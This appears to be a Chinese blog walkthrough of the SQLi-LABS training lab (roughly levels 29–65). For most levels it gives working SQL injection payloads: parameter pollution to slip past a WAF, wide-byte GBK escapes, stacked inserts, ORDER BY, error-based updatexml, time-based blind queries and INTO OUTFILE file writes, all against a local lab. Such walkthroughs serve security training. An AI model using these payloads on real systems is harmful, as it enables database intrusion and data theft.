<p>第一个，虽然sql语句用的是id1,但程序是在if下面一行一行执行的，id1的来源是url请求参数经过java_implimentation过来的。所以也会执行whitelist(id1); </p>
<p>​    $qs = $_SERVER[‘QUERY_STRING’]; </p>
<p>​    $hint=$qs; </p>
<p>​    $id1=java_implimentation($qs); </p>
<p>​    $id=$_GET[‘id’]; </p>
<p>​    whitelist($id1); </p>
<p>第二个，java_implimentation() 函数释义。 </p>
<p>function java_implimentation($query_string) </p>
<p>{ </p>
<p>​    $q_s = ​$query_string; </p>
<p>​    $qs_array= explode(“&amp;”,​$q_s); </p>
<p>​    foreach($qs_array as $key =&gt; $value) </p>
<p>​    { </p>
<p>​        $val=substr($value,0,2); </p>
<p>​        if($val==”id”) </p>
<p>​        { </p>
<p>​            $id_value=substr($value,3,30); </p>
<p>​            return $id_value; </p>
<p>​            break; //不再遍历第二个 </p>
<p>​        } </p>
<p>​    } </p>
<p>} </p>
<p>假如请求地址内容为 login.php?id=12&amp;id=abc </p>
<p>通过explode函数以&amp;分割，     </p>
<p>var_dump($qs_array);  //索引数组 </p>
<p>array(2) { [0]=&gt; string(5) “id=12” [1]=&gt; string(4) “id=b” } </p>
<p>所以取得$value 便为id=12 和 id=b </p>
<p>$var 的值，就是id</p>
<p>然后经过if去判断相等否，相等则return ,然后break ，不会遍历第二个id=b的 value</p>
<p>然后php+apache的组合是获取最后一个参数（相同参数），所以最后一个参数走进了sql语句，而第一个参数交给了waf去过滤（只要保证第一个参数是正常的，就不会处罚waf拦截）</p>
<p>第三个问题，利用场景，的确存在waf的拦截就是根据第一个参数的值来进行过滤的。 </p>
<h2 id="第30关"><a href="#第30关" class="headerlink" title="第30关"></a>第30关</h2><p> login.php </p>
<p>双引号+HPP </p>
<p>双引号 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-30/login.php?id=1&amp;id=0&quot;union" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-30/login.php?id=1&amp;id=0&quot;union</a> select 1,database(),3– - </p>
<h2 id="第32关"><a href="#第32关" class="headerlink" title="第32关"></a>第32关</h2><p>login.php </p>
<p>双引号+括号+HPP </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-31/login.php?id=1&amp;id=0&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-31/login.php?id=1&amp;id=0&quot;</a>) union select 1,version(),3– - </p>
<p>第32关 </p>
<p>过滤了 “ ‘ \反斜线符号; </p>
<p>原理上使用了 </p>
<p>mysql_query(“SET NAMES gbk”); </p>
<p>考虑宽字节注入。 </p>
<p>原理上的payload 是 -111%df%27 union select 1,user(),3 — - </p>
<p>本次没有成功 </p>
<p>##第33关 </p>
<p>经过了addslashes()函数，还又存在mysql_query(“set names gbk”); 所以存在宽字节注入 </p>
<p>宽字节注入 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-33?id=-1%df&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-33?id=-1%df&#39;</a> union select 1,user(),3 – - </p>
<p>真正的加固方法，应该是统一set 了编码，还要设置character_set_client=binary  </p>
<p>问题主要出在连接层。 </p>
<p>##第34关 </p>
<p>也是宽字节注入，POST型 </p>
<p>因为源代码中的select 是select 了两个字段，所以后面union 也需要是两个字段，而不是表中的3列。 </p>
<p>源代码：mysql_query(“SET NAMES gbk”); </p>
<p>​    @$sql=”SELECT username, password FROM users WHERE username=’$uname’ and password=’$passwd’ LIMIT 0,1”; </p>
<p>payload </p>
<p>uname=admin%df%27 union select 1,user()– -&amp;passwd=admin&amp;submit=Submit </p>
<p>##第35关 </p>
<p>绕过addslashes </p>
<p>$sql=”SELECT * FROM users WHERE id=$id LIMIT 0,1”; </p>
<p>源代码中并没有使用单引号闭合，所以addslashes() 转义就失去了意义，所以就不用构造单撇了 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-35?id=-1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-35?id=-1</a> union select 1,user(),3– - </p>
<p>##第36关 </p>
<p>绕过mysql_real_escape_string </p>
<p>函数释义，对特定字符进行转义操作，编码的字符是 NUL（ASCII 0）、\n、\r、\、’、” 和 Control-Z </p>
<p>源代码： </p>
<p>$uname = mysql_real_escape_string($uname1); </p>
<p>$passwd= mysql_real_escape_string($passwd1); </p>
<p>mysql_query(“SET NAMES gbk”); </p>
<p>@$sql=”SELECT username, password FROM users WHERE username=’$uname’ and password=’$passwd’ LIMIT 0,1”; </p>
<p>所以还是考虑宽字节注入 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-36?id=111111%df&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-36?id=111111%df&#39;</a> union select 1,user(),3 – - </p>
<p>##第37关 </p>
<p>Post 型，绕过mysql_real_escape_string()，同36关 </p>
<p>仍然使用宽字节注入，由于源码中的select 选择了两个字段，所以union select 也匹配两个字段 </p>
<p>uname=admin%df’ union select 1,database() – -&amp;passwd=111…aaa&amp;submit=Submit </p>
<p>##第38关 </p>
<p>普通注入 </p>
<p>and ‘1’=‘1 // 一般使用此语句，主要是是闭合sql语句后单撇 </p>
<p>Payload: </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-38?id=-11111&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-38?id=-11111&#39;</a>  union select 1,version(),3 ‘ </p>
<p>#Page-3 (Stacked Injections)</p>
<p>SQLi-LABS Page-3 (Stacked Injections)</p>
<p>##第38关<br>虽然union select 可以搞定，但不是考察点。<br>重点在mysqli_multi_query()<br>mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。</p>
<p>区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句；<br>而堆叠注入可以执行的是任意的语句。</p>
<p>payload<br><a href="http://127.0.0.1/sqli-labs/Less-38?id=11111&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-38?id=11111&#39;</a> ;insert into users (username,password) values (‘zhangwuji’,’meichaofeng’)– -</p>
<p>##第39关<br><a href="http://127.0.0.1/sqli-labs/Less-39?id=2" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-39?id=2</a> ; insert into users (username,password) values (‘guojing’,’huangrong’) – -</p>
<p>##第40关<br><a href="http://127.0.0.1/sqli-labs/Less-40?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-40?id=1&#39;</a>) and sleep(6) — -<br><a href="http://127.0.0.1/sqli-labs/Less-40?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-40?id=1&#39;</a>) and if(database()=’security’, sleep(6),sleep(0)) – -<br>以上payload 并不能体现是堆叠查询</p>
<p>下面面的payload 体现了堆叠，但的确盲，需要通过数据库查看，实际场景可能需要判断功能点，例如登录<br><a href="http://127.0.0.1/sqli-labs/Less-40?id=1&#39;)" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-40?id=1&#39;)</a>; insert into users (username,password) values (‘linghuchong’,’renyingying’) — -</p>
<p>##第41关<br>数字类型的堆叠注入<br><a href="http://127.0.0.1/sqli-labs/Less-41?id=1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-41?id=1</a>; insert into users (id,username,password) values (39,’dongxie’,’xidu’) – +</p>
<p>##第42关<br>报错堆叠<br>$username = mysqli_real_escape_string($con1, $_POST[“login_user”]);<br>$password = $_POST[“login_password”];</p>
<p>Username 使用了mysqli_real_escape_string() 函数过滤，这个会转义。<br>mysqli::real_escape_string – mysqli::escape_string – mysqli_real_escape_string — 根据当前连接的字符集，对于 SQL 语句中的特殊字符进行转义</p>
<p>Password 没有过滤<br>所以payload<br>login_user=admin&amp;login_password=123456’;create table stacktab (dd int) – +&amp;mysubmit=Login</p>
<p>##第43关<br>字符串加括号<br>login_user=admin&amp;login_password=123456’);create table stacktab43 (dd int) – +&amp;mysubmit=Login</p>
<p>##第44关<br>盲注<br>密码成功与否都会执行后面的堆叠语句。<br>login_user=admin&amp;login_password=123456’;create table stacktab44 (dd int) – +&amp;mysubmit=Login</p>
<p>##第45关<br>login_user=admin&amp;login_password=12345’);create table newtab (id int) – +&amp;mysubmit=Login<br>其中43关和45关利用方式一样，对比代码发现43关多一些sql报错的代码<br>也就是报错类，一般会有好sql语句报错提示，例如mysqli_error()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">'&lt;font size="5" color= "#FFFF00"&gt;'</span>;</span><br><span class="line">   print_r(mysqli_error($con1));</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">'&lt;font size="5" color= "#FFFF00"&gt;'</span>;</span><br><span class="line">   print_r(mysqli_error($con1));</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>##第46关<br>Order by 注入，基于报错，数字类型<br><a href="http://127.0.0.1/sqli-labs/Less-46?sort=if(database()=&#39;security&#39;," target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-46?sort=if(database()=&#39;security&#39;,</a>(select 1 union select 2),1)<br>提示Subquery returns more than 1 row 则证明条件表达式正确 （前提是基于报错，存在类似mysql_error()函数）<br><a href="http://127.0.0.1/sqli-labs/Less-46?sort=if(database()=&#39;security1&#39;,id,username" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-46?sort=if(database()=&#39;security1&#39;,id,username</a>) //这样的判断也可以，根据列的名称。<br>但如果使用数字就不行了，可以直接跟数字，但是不能跟运算得来的数字。如果是运算来的数字，则会默认按照排序</p>
<p>基于报错的payload<br><a href="http://127.0.0.1/sqli-labs/Less-46?sort=1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-46?sort=1</a> and(updatexml(1,concat(0x7e,(select database())),0)) – -</p>
<p>##第47关<br>比46关多个单撇，字符串类型，有报错函数<br><a href="http://127.0.0.1/sqli-labs/Less-47?sort=1%27and" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-47?sort=1%27and</a> if(database()=’security’,(select 1 union select 2),username) — -</p>
<p>基于报错<br><a href="http://127.0.0.1/sqli-labs/Less-47?sort=1%27" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-47?sort=1%27</a> and(updatexml(1,concat(0x7e,(select user())),0)) – -</p>
<p>##第48关<br>盲注<br>order by 数字型盲注<br>在MYSQL的官方手册，里面针对RAND()的提示大概意思就是，在ORDER BY从句里面不能使用RAND()函数，因为这样会导致数据列被多次扫描</p>
<p>payload<br><a href="http://127.0.0.1/sqli-labs/Less-48?sort=1," target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-48?sort=1,</a>(select 1 from (select sleep(5))a)</p>
<p>另外的payload （适用于数字类型，在字符串类型不适用）<br><a href="http://127.0.0.1/sqli-labs/Less-48?sort=rand(ascii(left(database(),1))=115)--" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-48?sort=rand(ascii(left(database(),1))=115)--</a> -<br>不太清楚小数的意义</p>
<p>MariaDB [security]&gt; select rand(1=1);<br>+———————+<br>| rand(1=1)           |<br>+———————+<br>| 0.40540353712197724 |<br>+———————+<br>1 row in set (0.00 sec)</p>
<p>MariaDB [security]&gt; select rand(1=2);<br>+———————+<br>| rand(1=2)           |<br>+———————+<br>| 0.15522042769493574 |<br>+———————+<br>1 row in set (0.00 sec)</p>
<p>相当于rand(true)  rand(false)</p>
<p>##第49关<br>字符串类型盲注入order by<br>存在报错函数就可以使用updatexml 或者select 1 union select 2 类 来报错判断<br>但可以使用基于时间的盲注（也就是延时注入），这样的结果排序也乱序，但确定条件正确与否。<br><a href="http://127.0.0.1/sqli-labs/Less-49?sort=1%27" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-49?sort=1%27</a> and if(database()=’security’,sleep(5),1) – -</p>
<p>注意if 前跟and </p>
<p>select * from users  order by 1 into outfile ‘/Applications/XAMPP/htdocs/onlytest/0319.txt’;</p>
<p>根据这一特性，可以通过写文件来判断order by 注入效果<br>payload:<br><a href="http://127.0.0.1/sqli-labs/Less-49?sort=2&#39;%20into%20outfile%20%20" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-49?sort=2&#39;%20into%20outfile%20%20</a> “/Applications/XAMPP/htdocs/onlytest/0320.txt”– -</p>
<p>##第50关<br>Order by 注入，报错注入，堆叠<br><a href="http://127.0.0.1/sqli-labs/Less-50?sort=1;insert" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-50?sort=1;insert</a> into users (id,username,password) values (15,’dongxie’,’xidu’)– -<br>以上这个payload 并不完美，因为没有体现报错。<br>如下payload可以体现报错，但没有体现堆叠<br><a href="http://127.0.0.1/sqli-labs/Less-50?sort=1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-50?sort=1</a> and(updatexml(1,concat(0x7e,(select user())),0)) – -</p>
<p>##第51关<br><a href="http://127.0.0.1/sqli-labs/Less-51?sort=1&#39;;insert" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-51?sort=1&#39;;insert</a> into users (id,username,password) values (16,’nandi’,’beigai’)– -</p>
<p>##第52关<br>盲注<br>与第50关的区别，就是50管存在mysqli_error($con1)函数<br><a href="http://127.0.0.1/sqli-labs/Less-52?sort=1;insert" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-52?sort=1;insert</a> into users (id,username,password) values (17,’wangchaohyang’,’linchaoying’)– -</p>
<p>##第53关<br>与第52关差不多，主要是字符串类型，盲注入<br><a href="http://127.0.0.1/sqli-labs/Less-53?sort=1&#39;;insert" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-53?sort=1&#39;;insert</a> into users (id,username,password) values (18,’linghuchong’,’renyingying’)– -</p>
<p>#Page-4 (Challenges)</p>
<p>##第54关 </p>
<p>目标：十次内获得key 的值，每次都随便变化表明、列明 </p>
<p>$sql=”SELECT * FROM security.users WHERE id=’$id’ LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;</a> union select 1,database(),version() — - </p>
<p>查询哪些表 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;</a> union select 1,2, table_name from information_schema.tables where table_schema=database() — - </p>
<p>//HLRAMAT8OB </p>
<p>查询哪些列 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;</a> union select 1,2, group_concat(column_name) from information_schema.columns where  table_name=’HLRAMAT8OB’ – - </p>
<p>//id,sessid,secret_A0S3,tryy </p>
<p>查询指定列的内容 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1&#39;</a> union select 1,2, secret_A0S3 from challenges.HLRAMAT8OB — - </p>
<p>//KhNq8YYPQbwOVY9BCMVgMrhu </p>
<p>提交value 就是答案 </p>
<p>##第55关 </p>
<p>要求14次 </p>
<p>$sql=”SELECT * FROM security.users WHERE id=($id) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-55/index.php?id=0" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-55/index.php?id=0</a>) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-55/index.php?id=0" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-55/index.php?id=0</a>) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’M93G5TMAL3’ – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-55/index.php?id=0" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-55/index.php?id=0</a>) union select 1,2,secret_QPDL from challenges.M93G5TMAL3 – - </p>
<p>##第56关 </p>
<p>闭合单撇和括号 </p>
<p>$sql=”SELECT * FROM security.users WHERE id=(‘$id’) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-56/index.php?id=0&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-56/index.php?id=0&#39;</a>) union select 1,2,database() – - </p>
<p>##第57关 </p>
<p>闭合双引号 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-57/index.php?id=0&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-57/index.php?id=0&quot;</a> union select 1,2,database() – - </p>
<p>##第58关 </p>
<p>比54关，回显做了白名单处理 </p>
<p>$sql=”SELECT * FROM security.users WHERE id=’$id’ LIMIT 0,1”; </p>
<p>Payload: </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27</a> and(updatexml(1,concat(0x7e,(select database())),0)) – - </p>
<p>//获得表的名称3ESATPRS7P </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27</a> and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0)) – - </p>
<p>//获取列名</p>
<p><a href="http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27</a> and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’3ESATPRS7P’)),0)) – - </p>
<p>//获取值 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-58/index.php?id=0%27</a> and(updatexml(1,concat(0x7e,(select secret_56Z4 from challenges.3ESATPRS7P)),0)) – - </p>
<p>没有太明白怎么double query </p>
<p>##第59关 </p>
<p>同58关，sql语句没有单引号了 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-59/index.php?id=0" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-59/index.php?id=0</a> and(updatexml(1,concat(0x7e,(select database())),0)) – - </p>
<p>##第60关 </p>
<p>源代码比59关的源代码多了（“”） </p>
<p>$id = ‘(“‘.$id.’”)’; </p>
<p>闭合id即可 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-60/index.php?id=0&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-60/index.php?id=0&quot;</a>) and updatexml(1,concat(0x7e,(select database())),0) – - </p>
<p>##第61关 </p>
<p>$sql=”SELECT * FROM security.users WHERE id=((‘$id’)) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-61/index.php?id=0&#39;)" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-61/index.php?id=0&#39;)</a>) and updatexml(1,concat(0x7e,(select database())),0) – - </p>
<p>##第62关 </p>
<p>回显处已白名单数组处理 </p>
<p>没有sql报错函数，盲注(基于时间、基于布尔、基于报错盲注)，这里使用基于时间的盲注 </p>
<p>PS:有个知识点盲区，<strong>基于报错的盲注</strong>，（<strong>有回显不一定有报错，有报错也不一定有回显</strong>） </p>
<p>例如有报错函数的盲注就叫做基于报错类型的盲注，例如if(1=1,(select 1 union select 2),1) </p>
<p>$sql=”SELECT * FROM security.users WHERE id=(‘$id’) LIMIT 0,1”; </p>
<p>Payload: </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-62?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-62?id=1&#39;</a>) and if(1=1,sleep(5),1) – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-62?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-62?id=1&#39;</a>) and if(database()=’challenges’,sleep(5),1) – - </p>
<p>猜测第一个数据的字母 //chr(78)=N </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-62?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-62?id=1&#39;</a>) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=78,sleep(5),1) – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-62?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-62?id=1&#39;</a>) and if(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),10)=’NW9K6F9XJY’,sleep(5),1) – - </p>
<p>猜测第一个字段的字母 //chr(105)=i </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-62?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-62?id=1&#39;</a>) and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=’NW9K6F9XJY’),1,1))=105,sleep(5),1) – - </p>
<p>##第63关 </p>
<p>同62，单引号闭合 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-63?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-63?id=1&#39;</a> and if(database()=’challenges’, sleep(5),1) – - </p>
<p>##第64关 </p>
<p>$sql=”SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-64?id=1)" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-64?id=1)</a>) and if(database()=’challenges’, sleep(5),1) – - </p>
<p>##第65关 </p>
<p>$id = ‘“‘.$id.’”‘; </p>
<p>$sql=”SELECT * FROM security.users WHERE id=($id) LIMIT 0,1”; </p>
<p>Payload: </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-65?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-65?id=1&quot;</a>) and if(database()=’challenges’, sleep(5),1) – - </p>
<p>第66关后，没有了。 </p>
<p>#Referer</p>
<p><a href="https://blog.csdn.net/qq_41420747/article/details/81836327" target="_blank" rel="noopener">https://blog.csdn.net/qq_41420747/article/details/81836327</a></p>
<p><a href="https://blog.csdn.net/harrywade/article/details/81842491" target="_blank" rel="noopener">https://blog.csdn.net/harrywade/article/details/81842491</a></p>
<p><a href="https://github.com/lcamry/sqli-labs" target="_blank" rel="noopener">https://github.com/lcamry/sqli-labs</a></p>
<p><a href="https://github.com/WangYihang/sqli-labs" target="_blank" rel="noopener">https://github.com/WangYihang/sqli-labs</a></p>
<p>#后记</p>
<p>做完后，发现有些payload 并没有完全按照源码的意图去fuzzing</p>
<p>基于漏洞的生命周期（原理、利用、加固、绕过），还是应该多思考基础原理，尤其是底层数据库的一些特性。</p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/02/16/渗透本质/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">渗透本质</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>






</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2019 sm0nk
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">


<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: true
	}
</script>
<script src="/js/main.js"></script>



<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>